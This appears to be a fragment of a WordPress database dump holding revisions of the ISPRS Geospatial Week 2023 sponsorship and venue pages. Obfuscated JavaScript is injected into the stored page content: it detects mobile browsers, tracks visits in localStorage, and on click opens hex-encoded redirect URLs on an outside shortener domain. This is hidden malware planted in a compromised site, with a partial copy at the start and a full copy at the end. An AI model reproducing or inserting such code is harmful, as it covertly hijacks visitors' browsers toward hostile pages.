_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-02-04 06:02:41','2023-02-04 06:02:41','',2679,'https://gsw2023.com/?p=3751',0,'revision','',0),
(3752,1,'2023-02-04 06:13:41','2023-02-04 06:13:41','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</p>\n<p>&nbsp;</p>\n<p>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</p>\n<p>of dedicated workshops. More information regarding ISPRS can be found at:</p>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<p>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</p>\n<p>&nbsp;</p>\n<p>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</p>\n<p>&nbsp;</p>\n<p>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</p>\n<h5></h5>\n<p>The GSW2023 Organizing Committee.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]</p>\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 06:13:41','2023-02-04 06:13:41','',2920,'https://gsw2023.com/?p=3752',0,'revision','',0),
